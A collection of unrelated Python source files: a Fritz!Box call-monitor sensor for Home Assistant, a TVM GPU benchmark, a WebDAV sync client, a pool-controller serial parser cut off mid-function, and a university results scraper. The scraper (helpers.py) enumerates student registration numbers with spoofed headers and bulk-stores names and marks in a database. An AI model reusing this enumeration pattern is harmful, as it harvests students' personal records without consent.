session_file = os.path.join(semi_persistent_directory, 'staged',
names.PICKLED_MAIN_SESSION_FILE)
if os.path.isfile(session_file):
pickler.load_session(session_file)
else:
_LOGGER.warning(
'No session file found: %s. Functions defined in __main__ '
'(interactive session) may fail.', session_file)
else:
_LOGGER.warning(
'No semi_persistent_directory found: Functions defined in __main__ '
'(interactive session) may fail.')
if __name__ == '__main__':
main(sys.argv)
|
sensor.py
|
"""Sensor to monitor incoming/outgoing phone calls on a Fritz!Box router."""
import datetime
import logging
import re
import socket
import threading
import time
from fritzconnection.lib.fritzphonebook import FritzPhonebook
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = "phonebook"
CONF_PREFIXES = "prefixes"
DEFAULT_HOST = "169.254.1.1" # IP valid for all Fritz!Box routers
DEFAULT_NAME = "Phone"
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = "dialing"
VALUE_CONNECT = "talking"
VALUE_DEFAULT = "idle"
VALUE_DISCONNECT = "idle"
VALUE_RING = "ringing"
# Return cached results if phonebook was downloaded less then this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default="admin"): cv.string,
vol.Optional(CONF_USERNAME, default=""): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]): vol.All(cv.ensure_list, [cv.string]),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
# Try to resolve a hostname; if it is already an IP, it will be returned as-is
try:
host = socket.gethostbyname(host)
except socket.error:
_LOGGER.error("Could not resolve hostname %s", host)
return
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get(CONF_PHONEBOOK)
prefixes = config.get(CONF_PREFIXES)
try:
phonebook = FritzBoxPhonebook(
host=host,
port=port,
username=username,
password=password,
phonebook_id=phonebook_id,
prefixes=prefixes,
)
except: # noqa: E722 pylint: disable=bare-except
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box", phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_entities([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, _stop_listener)
return monitor.sock is not None
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self.phonebook is not None
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return "unknown"
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
_LOGGER.debug("Setting up socket...")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error(
"Cannot connect to %s on port %s: %s", self.host, self.port, err
)
def _listen(self):
"""Listen to incoming or outgoing calls."""
_LOGGER.debug("Connection established, waiting for response...")
while not self.stopped.isSet():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
_LOGGER.debug("Received %s", response)
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
_LOGGER.warning("Connection lost, reconnecting...")
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {
"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime,
}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
att = {
"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime,
}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": line[3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
class FritzBoxPhonebook:
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password, phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# Establish a connection to the FRITZ!Box.
self.fph = FritzPhonebook(
address=self.host, user=self.username, password=self.password
)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {
re.sub(r"[^\d\+]", "", nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs
}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r"[^\d\+]", "", str(number))
if self.number_dict is None:
return "unknown"
try:
return self.number_dict[number]
except KeyError:
pass
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip("0")]
except KeyError:
pass
return "unknown"
|
gpu_imagenet_bench.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Benchmark script for ImageNet models on GPU.
see README.md for the usage and results of this script.
"""
import argparse
import threading
import numpy as np
import tvm
from tvm import te
import tvm.contrib.graph_executor as runtime
from tvm import relay
from util import get_network
def benchmark(network, target):
net, params, input_shape, output_shape = get_network(network, batch_size=1)
with tvm.transform.PassContext(opt_level=3):
lib = relay.build(net, target=target, params=params)
# create runtime
dev = tvm.device(str(target), 0)
module = runtime.GraphModule(lib["default"](dev))
data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))
module.set_input("data", data_tvm)
# evaluate
ftimer = module.module.time_evaluator("run", dev, number=1, repeat=args.repeat)
prof_res = np.array(ftimer().results) * 1000 # multiply 1000 for converting to millisecond
print(
"%-20s %-19s (%s)" % (network, "%.2f ms" % np.mean(prof_res), "%.2f ms" % np.std(prof_res))
)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--network",
type=str,
choices=[
"resnet-18",
"resnet-34",
"resnet-50",
"vgg-16",
"vgg-19",
"densenet-121",
"inception_v3",
"mobilenet",
"squeezenet_v1.0",
"squeezenet_v1.1",
],
help="The name of neural network",
)
parser.add_argument(
"--device",
type=str,
choices=["amd_apu"],
default="amd_apu",
help="The name of the test device. If your device is not listed in "
"the choices list, pick the most similar one as argument.",
)
parser.add_argument(
"--model",
type=str,
choices=["1080ti", "titanx", "tx2", "gfx900", "v1000"],
default="1080ti",
help="The model of the test device. If your device is not listed in "
"the choices list, pick the most similar one as argument.",
)
parser.add_argument("--repeat", type=int, default=600)
parser.add_argument(
"--target",
type=str,
choices=["cuda", "opencl", "rocm", "nvptx", "metal", "vulkan"],
default="cuda",
help="The tvm compilation target",
)
parser.add_argument("--thread", type=int, default=1, help="The number of threads to be run.")
args = parser.parse_args()
dtype = "float32"
if args.network is None:
networks = ["resnet-50", "mobilenet", "vgg-19", "inception_v3"]
else:
networks = [args.network]
target = tvm.target.Target("%s -device=%s -model=%s" % (args.target, args.device, args.model))
print("--------------------------------------------------")
print("%-20s %-20s" % ("Network Name", "Mean Inference Time (std dev)"))
print("--------------------------------------------------")
for network in networks:
if args.thread == 1:
benchmark(network, target)
else:
threads = list()
for n in range(args.thread):
thread = threading.Thread(
target=benchmark, args=([network, target]), name="thread%d" % n
)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
helpers.py
|
from pymongo import MongoClient
import pymongo
from collections import OrderedDict
from lxml import etree, html
import requests
import urllib2
import threading
NUM_OF_STUDENTS = 150
RESPONSE_COUNT = 0
NUM_OF_COLLEGES = 172
#BRANCH_CODES = ['bt', 'cv', 'ee', 'ec', 'te', 'is', 'cs', 'me']
BRANCH_CODES = ['is']
BASE_URL = 'http://results.vtu.ac.in'
def student_results(college_code='1MV', year='14', branch='IS', regno=45):
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0',
'X-Requested-With': 'XMLHttpRequest',
'Host': 'results.vtu.ac.in',
'Referer': 'http://results.vtu.ac.in/'
}
payload = {
'rid': college_code.upper() + year + branch.upper() + str(regno).zfill(3),
'submit': 'SUBMIT'
}
# xpath selector for subject name
sub_xpath = '/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[2]/tr[{}]/td[{}]/i/text()'
# xpath selector for subject external marks, internal marks and total marks
sub_xpath2 = '/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[2]/tr[{}]/td[{}]/text()'
# xpath selector for subject result
sub_xpath3 = '/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[2]/tr[{}]/td[{}]/b/text()'
response = requests.post(BASE_URL + '/vitavi.php', payload, headers=headers)
tree = html.fromstring(response.content)
print ("\n---------------------------------------\n")
print ("Response code : ")
print (response.status_code)
# student details
student_name_usn = tree.xpath('/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/b/text()')
total_marks = tree.xpath('/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[3]/tr/td[4]/text()')
semester = tree.xpath('/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[1]/tr/td[2]/b/text()')
result = tree.xpath('/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[1]/tr/td[4]/b/text()')
# subject details
sub1 = tree.xpath(sub_xpath.format('2', '1'))
sub1_external = tree.xpath(sub_xpath2.format('2', '2'))
sub1_internal = tree.xpath(sub_xpath2.format('2', '3'))
sub1_total = tree.xpath(sub_xpath2.format('2', '4'))
sub1_result = tree.xpath(sub_xpath3.format('2', '5'))
sub2 = tree.xpath(sub_xpath.format('3', '1'))
sub2_external = tree.xpath(sub_xpath2.format('3', '2'))
sub2_internal = tree.xpath(sub_xpath2.format('3', '3'))
sub2_total = tree.xpath(sub_xpath2.format('3', '4'))
sub2_result = tree.xpath(sub_xpath3.format('3', '5'))
sub3 = tree.xpath(sub_xpath.format('4', '1'))
sub3_external = tree.xpath(sub_xpath2.format('4', '2'))
sub3_internal = tree.xpath(sub_xpath2.format('4', '3'))
sub3_total = tree.xpath(sub_xpath2.format('4', '4'))
sub3_result = tree.xpath(sub_xpath3.format('4', '5'))
sub4 = tree.xpath(sub_xpath.format('5', '1'))
sub4_external = tree.xpath(sub_xpath2.format('5', '2'))
sub4_internal = tree.xpath(sub_xpath2.format('5', '3'))
sub4_total = tree.xpath(sub_xpath2.format('5', '4'))
sub4_result = tree.xpath(sub_xpath3.format('5', '5'))
sub5 = tree.xpath(sub_xpath.format('6', '1'))
sub5_external = tree.xpath(sub_xpath2.format('6', '2'))
sub5_internal = tree.xpath(sub_xpath2.format('6', '3'))
sub5_total = tree.xpath(sub_xpath2.format('6', '4'))
sub5_result = tree.xpath(sub_xpath3.format('6', '5'))
sub6 = tree.xpath(sub_xpath.format('7', '1'))
sub6_external = tree.xpath(sub_xpath2.format('7', '2'))
sub6_internal = tree.xpath(sub_xpath2.format('7', '3'))
sub6_total = tree.xpath(sub_xpath2.format('7', '4'))
sub6_result = tree.xpath(sub_xpath3.format('7', '5'))
sub7 = tree.xpath(sub_xpath.format('8', '1'))
sub7_external = tree.xpath(sub_xpath2.format('8', '2'))
sub7_internal = tree.xpath(sub_xpath2.format('8', '3'))
sub7_total = tree.xpath(sub_xpath2.format('8', '4'))
sub7_result = tree.xpath(sub_xpath3.format('8', '5'))
sub8 = tree.xpath(sub_xpath.format('9', '1'))
sub8_external = tree.xpath(sub_xpath2.format('9', '2'))
sub8_internal = tree.xpath(sub_xpath2.format('9', '3'))
sub8_total = tree.xpath(sub_xpath2.format('9', '4'))
sub8_result = tree.xpath(sub_xpath3.format('9', '5'))
try:
student_name_usn = student_name_usn[0].split('(')
result = result[0].split()
total_marks = total_marks[0].strip().replace(' ','')
if len(result) == 5:
result = result[1] + ' ' + result[2] + ' ' + result[3] + ' ' + result[4]
elif len(result) == 3:
result = result[1] + ' ' + result[2]
elif len(result) == 2:
result = result[1]
student = OrderedDict([
('name', student_name_usn[0].strip()),
('usn', student_name_usn[1].strip().replace(')', '')),
('semester', semester[0]),
('result', result),
('total_marks', total_marks),
('college_code', college_code),
('year', year),
('branch', branch),
('subject_marks', [
OrderedDict([
('subject', sub1[0]),
('external', sub1_external[0]),
('internal', sub1_internal[0]),
('total', sub1_total[0]),
('result', sub1_result[0])
]),
OrderedDict([
('subject', sub2[0]),
('external', sub2_external[0]),
('internal', sub2_internal[0]),
('total', sub2_total[0]),
('result', sub2_result[0])
]),
OrderedDict([
('subject', sub3[0]),
('external', sub3_external[0]),
('internal', sub3_internal[0]),
('total', sub3_total[0]),
('result', sub3_result[0])
]),
OrderedDict([
('subject', sub4[0]),
('external', sub4_external[0]),
('internal', sub4_internal[0]),
('total', sub4_total[0]),
('result', sub4_result[0])
]),
OrderedDict([
('subject', sub5[0]),
('external', sub5_external[0]),
('internal', sub5_internal[0]),
('total', sub5_total[0]),
('result', sub5_result[0])
]),
OrderedDict([
('subject', sub6[0]),
('external', sub6_external[0]),
('internal', sub6_internal[0]),
('total', sub6_total[0]),
('result', sub6_result[0])
]),
OrderedDict([
('subject', sub7[0]),
('external', sub7_external[0]),
('internal', sub7_internal[0]),
('total', sub7_total[0]),
('result', sub7_result[0])
]),
OrderedDict([
('subject', sub8[0]),
('external', sub8_external[0]),
('internal', sub8_internal[0]),
('total', sub8_total[0]),
('result', sub8_result[0])
]),
])
])
except IndexError as e:
#print("USN doesn't exist\n")
student = None
return student
def insert_section_results(college_code='1MV', year='14', branch='IS'):
client = MongoClient(document_class=OrderedDict)
db = client.results
db.students.ensure_index('usn', unique=True)
NONE_STUDENT_LIMIT = 20
NONE_STUDENT_COUNT = 0
STUDENT_COUNT = 0
regno = 1
while True:
if (STUDENT_COUNT >= 20):
STUDENT_COUNT=0
STUDENT_COUNT = STUDENT_COUNT + 1
usn = college_code.upper()+year.upper()+branch.upper()+str(regno).zfill(3).upper()
result = student_results(college_code=college_code, year=year, branch=branch, regno=regno)
print("Tried inserting : ")
print (usn)
if (result != None):
try:
db.students.insert_one(result)
print ("Inserted : ")
print (usn)
except :
pass
print ("\n---------------------------------------\n")
else:
NONE_STUDENT_COUNT = NONE_STUDENT_COUNT + 1
regno = regno +1
if (NONE_STUDENT_COUNT == NONE_STUDENT_LIMIT or regno >=150):
break
def insert_college_results(college_code, year='14'):
for branch in BRANCH_CODES:
insert_section_results(college_code=college_code, year=year, branch=branch)
def insert_region_results(COLLEGE_CODES):
#COLLEGE_CODES = list(COLLEGE_CODES)
for college_code in COLLEGE_CODES:
insert_college_results(college_code=college_code, year='14')
def insert_region_results_multithreaded(COLLEGE_CODES, num_threads=5):
cpt=NUM_OF_COLLEGES/num_threads #colleges_per_thread
threads = []
for i in range(num_threads):
t = threading.Thread(target=insert_region_results, args=(COLLEGE_CODES[i*cpt:((i+1)*cpt)-1],))
threads.append(t)
t.start()
t = threading.Thread(target=insert_region_results, args=(COLLEGE_CODES[(i+1)*cpt:],))
threads.append(t)
t.start()
|
yandexwebdav.py
|
#!/usr/bin/python
# coding=utf-8
import os
import sys
import threading
import logging
import base64
import xml.dom.minidom
from six.moves import queue
from six.moves import http_client
from six import u, b, PY3
if PY3:
from urllib.parse import unquote, quote
else:
from urllib import unquote, quote
logger = logging.getLogger("yandexwebdav.py")
TRYINGS = 3
def _encode_utf8(txt):
if not PY3:
if type(txt) == unicode:
return txt.encode("utf-8")
return txt
def _decode_utf8(txt):
if PY3:
if type(txt) is str:
return txt
return txt.decode("utf-8")
def _(path):
"""
Normalize path to unicode
:param path: path
:return: normalize path
>>> _(None)
u''
>>> _(u("test1"))
u'test1'
>>> _("test2")
u'test2'
"""
if path is None:
return u("")
if not PY3:
if type(path) == unicode:
return path
try:
return _decode_utf8(path)
except UnicodeDecodeError:
pass
return path
def remote(href):
"""
Normalize remote href
:param href: remote path
:return: normalize href
>>> remote("/test/hello.txt")
u'/test/hello.txt'
>>> remote("test/hello.txt")
u'/test/hello.txt'
>>> remote("test\hello.txt")
u'/test/hello.txt'
>>> remote(None)
u'/'
"""
href = _(href)
href = os.path.join(u("/"), href)
if os.sep == "\\":
href = href.replace("\\", "/")
return href
class RemoteObject(object):
def __init__(self, dom, config, root):
self._dom = dom
self._config = config
self.root = root
href = self._getEl("href")
href = _encode_utf8(href)
self.href = _decode_utf8(unquote(href))
self.length = self._getEl("getcontentlength")
self.name = self._getEl("displayname")
self.creationdate = self._getEl("creationdate")
def _getEl(self, name):
els = self._dom.getElementsByTagNameNS("DAV:", name)
return els[0].firstChild.nodeValue if len(els) > 0 else ""
def isFolder(self):
els = self._dom.getElementsByTagNameNS("DAV:", "collection")
return len(els) > 0
def download(self):
return self._config.download(self.href)
def downloadTo(self, path):
return self._config.downloadTo(self.href, path)
def delete(self):
return self._config.delete(self.href)
def list(self):
if self.isFolder() and self.href != self.root:
return self._config.list(os.path.join(self.root, self.href))
return []
def __str__(self):
return self.href
def __unicode__(self):
return self.href
qWork = queue.Queue()
def __call():
while True:
try:
name, func, args = qWork.get()
func(*args)
qWork.task_done()
except queue.Empty:
pass
except Exception:
e = sys.exc_info()[1]
print("Exception: {0} {1}".format(name, e))
threadsContainer = []
def apply_async(name, func, params_list, limit=5):
for params in params_list:
if type(params) is list or type(params) is tuple:
item = (name, func, params)
else:
item = (name, func, [params, ])
res = qWork.put_nowait(item)
if len(threadsContainer) > 0:
return
for i in range(limit):
t = threading.Thread(target=__call)
t.daemon = True
threadsContainer.append(t)
for th in threadsContainer:
th.start()
class ConnectionException(Exception):
"""docstring for NotAuthException"""
def __init__(self, code, msg=""):
strError = _("Not Authorization status code: {0}\n{1}").format(code, msg)
self.code = code
super(ConnectionException, self).__init__(strError)
def checkResponse(response, msg=""):
if response.status not in [200, 201, 207]:
raise ConnectionException(response.status, msg)
class Config(object):
def __init__(self, opts):
"""
Constructor
:param opts: dictionary of property
:return: self
"""
self.user = _encode_utf8(opts.get("user", ""))
self.password = _encode_utf8(opts.get("password", ""))
self.host = _encode_utf8(opts.get("host", "webdav.yandex.ru"))
self.options = opts
self.limit = opts.get("limit", 4)
def getHeaders(self):
"""
Get common headers
:return:
"""
basicauth = base64.encodestring(b(self.user + ':' + self.password)).strip()
return {
"Depth": "1",
"Authorization": 'Basic ' + _decode_utf8(basicauth),
"Accept": "*/*"
}
def getConnection(self):
"""
Get connection
:return: connection http_client.HTTPSConnection
"""
return http_client.HTTPSConnection(self.host)
def list(self, href):
"""
list of files and directories at remote server
:param href: remote folder
:return: list(folders, files) and list(None,None) if folder doesn't exist
"""
for iTry in range(TRYINGS):
logger.info(u("list(%s): %s") % (iTry, href))
folders = None
files = None
try:
href = os.path.join(u("/"), _(href))
conn = self.getConnection()
href = _encode_utf8(href)
href = quote(href)
conn.request("PROPFIND",href, u(""), self.getHeaders())
response = conn.getresponse()
checkResponse(response)
data = response.read()
if data == b('list: folder was not found'):
return folders, files
elif data == b('You are not authorized to see this!'):
return folders, files
else:
try:
dom = xml.dom.minidom.parseString(data)
responces = dom.getElementsByTagNameNS("DAV:", "response")
folders = {}
files = {}
for dom in responces:
response = RemoteObject(dom, self, href)
if response.href != href:
if response.isFolder():
folders[response.href] = response
else:
files[response.href] = response
except xml.parsers.expat.ExpatError:
e = sys.exc_info()[1]
logger.exception(e)
return folders, files
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
return folders, files
def sync(self, localpath, href, exclude=None, block=True):
"""
Sync local and remote folders
:param localpath: local folder
:param href: remote folder
:param exclude: filter folder which need to exlude
:return: respose
"""
logger.info(u("sync: %s %s") % (localpath, href))
try:
localpath = _(localpath)
href = remote(href)
localRoot, localFolders, localFiles = next(os.walk(localpath))
remoteFolders, remoteFiles = self.list(href)
if remoteFiles is None or remoteFolders is None:
remoteFiles = {}
remoteFolders = {}
self.mkdir(href)
def norm(folder):
path = os.path.join(href, _(folder))
if path[len(path) - 1] != os.path.sep:
path += u("/")
return path
foldersToCreate = filter(
lambda folderPath: folderPath not in remoteFolders,
map(norm, localFolders)
)
apply_async("mkdir", lambda path: self.mkdir(path), foldersToCreate, self.limit)
filesToSync = filter(
lambda lFile: os.path.join(href, _(lFile)) not in remoteFiles,
localFiles
)
fileArgs = [(os.path.join(localpath, f), os.path.join(href, f))
for f in filesToSync]
apply_async("upload", lambda s, t: self.upload(s, t), fileArgs, self.limit)
for folder in localFolders:
localFolderPath = os.path.join(localpath, folder)
remoteFolderPath = os.path.join(href, folder)
if exclude:
bSync = exclude(localFolderPath, remoteFolderPath)
else:
bSync = True
if bSync:
apply_async(
"sync",
lambda localpath, href: self.sync(localpath, href, exclude, False),
[(localFolderPath, remoteFolderPath), ]
)
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
if block:
qWork.join()
def mkdir(self, href):
"""
create remote folder
:param href: remote path
:return: response
"""
for iTry in range(TRYINGS):
logger.info(u("mkdir(%s): %s") % (iTry, href))
try:
href = remote(href)
href = _encode_utf8(href)
href = quote(href)
con = self.getConnection()
con.request("MKCOL", href, "", self.getHeaders())
response = con.getresponse()
checkResponse(response)
return response.read()
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def download(self, href):
"""
Download file and return response
:param href: remote path
:return: file responce
"""
for iTry in range(TRYINGS):
try:
logger.info(u("download(%s): %s") % (iTry, href))
href = remote(href)
href = _encode_utf8(href)
href = quote(href)
conn = self.getConnection()
conn.request("GET", href, "", self.getHeaders())
response = conn.getresponse()
checkResponse(response, "href={0}".format(href))
data = response.read()
if data == b('resource not found'):
return b("")
else:
return data
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def downloadTo(self, href, localpath):
"""
Download file to localstorage
:param href: remote path
:param localpath: local path
:return: response
"""
for iTry in range(TRYINGS):
logger.info(u("downloadTo(%s): %s %s") % (iTry, href, localpath))
try:
href = remote(href)
localpath = _(localpath)
href = _encode_utf8(href)
href = quote(href)
conn = self.getConnection()
conn.request("GET", href, "", self.getHeaders())
response = conn.getresponse()
checkResponse(response)
f = None
try:
while True:
data = response.read(1024)
if not data:
break
if data == u('resource not found'):
return False
if not f:
f = open(localpath, "wb")
f.write(data)
finally:
if f:
f.close()
return True
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def delete(self, href):
"""
Delete file from remote server
:param href: remote path
:return: response
"""
for iTry in range(TRYINGS):
logger.info(u("delete(%s): %s") % (iTry, href))
try:
href = remote(href)
href = _encode_utf8(href)
href = quote(href)
conn = self.getConnection()
conn.request("DELETE", href, "", self.getHeaders())
response = conn.getresponse()
checkResponse(response)
return response.read()
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def write(self, f, href, length=None):
logger.info(u("write: %s") % href)
href = remote(href)
href = os.path.join(u("/"), href)
try:
conn = self.getConnection()
headers = self.getHeaders()
headers.update({
"Content-Type": "application/binary",
"Expect": "100-continue"
})
if length:
headers["Content-Length"] = length
href = _encode_utf8(href)
href = quote(href)
conn.request("PUT", href, f, headers)
response = conn.getresponse()
checkResponse(response)
data = response.read()
return data
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
def upload(self, localpath, href):
"""
Upload file from localpath to remote server
:param localpath: local path
:param href: remote path
:return: response
"""
localpath = _(localpath)
href = remote(href)
if not os.path.exists(localpath):
logger.info(u("ERROR: localfile: %s not found") % localpath)
return
if os.path.islink(localpath):
return self.upload(os.path.abspath(os.path.realpath(localpath)), href)
# 3 tryings to upload file
for iTry in range(TRYINGS):
try:
logger.info(u("upload: %s %s") % (localpath, href))
length = os.path.getsize(localpath)
if PY3:
_open = open(_encode_utf8(localpath), "rb")
else:
_open = open(_encode_utf8(localpath), "r")
with _open as f:
return self.write(f, href, length=length)
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
if __name__ == "__main__":
pass
|
pool-pi.py
|
from distutils.log import INFO
from commands import *
from threading import Thread
from model import *
from web import *
from parsing import *
from os import makedirs
from os.path import exists
from os import stat
import logging
from logging.handlers import TimedRotatingFileHandler
#TODO start this on pi startup
def readSerialBus(serialHandler):
'''
Read data from the serial bus to build full frame in buffer.
Serial frames begin with DLE STX and terminate with DLE ETX.
With the exception of searching for the two start bytes, this function only reads one byte to prevent blocking other processes.
When looking for start of frame, looking_for_start is True.
When buffer is filled with a full frame and ready to be parseed, set buffer_full to True.
'''
if (serialHandler.in_waiting() == 0
): #Check if we have serial data to read
return
if (serialHandler.buffer_full == True
): #Check if we already have a full frame in buffer
return
serChar = serialHandler.read()
if serialHandler.looking_for_start:
# We are looking for DLE STX to find beginning of frame
if serChar == DLE:
serChar = serialHandler.read()
if serChar == STX:
# We have found start (DLE STX)
serialHandler.buffer.clear()
serialHandler.buffer += DLE
serialHandler.buffer += STX
serialHandler.looking_for_start = False
return
else:
# We have found DLE but not DLE STX
return
else:
# Non-DLE character
# We are only interested in DLE to find potential start
return
else:
# We have already found the start of the frame
# We are adding to buffer while looking for DLE ETX
serialHandler.buffer += serChar
# Check if we have found DLE ETX
if ((serChar == ETX)
and (serialHandler.buffer[-2] == int.from_bytes(DLE, 'big'))):
# We have found a full frame
serialHandler.buffer_full = True
serialHandler.looking_for_start = True
return
def parseBuffer(poolModel, serialHandler, commandHandler):
'''
If we have a full frame in buffer, parse it.
If frame is keep alive, check to see if we are ready to send a command and if so send it.
'''
if (serialHandler.buffer_full):
frame = serialHandler.buffer
# Remove any extra x00 after x10
frame = frame.replace(b'\x10\x00', b'\x10')
# Ensure no erroneous start/stop within frame
if b'\x10\x02' in frame[2:-2]:
logging.error(f'DLE STX in frame: {frame}')
serialHandler.reset()
return
if b'\x10\x03' in frame[2:-2]:
logging.error(f'DLE ETX in frame: {frame}')
serialHandler.reset()
return
# Compare calculated checksum to frame checksum
if (confirmChecksum(frame) == False):
# If checksum doesn't match, message is invalid.
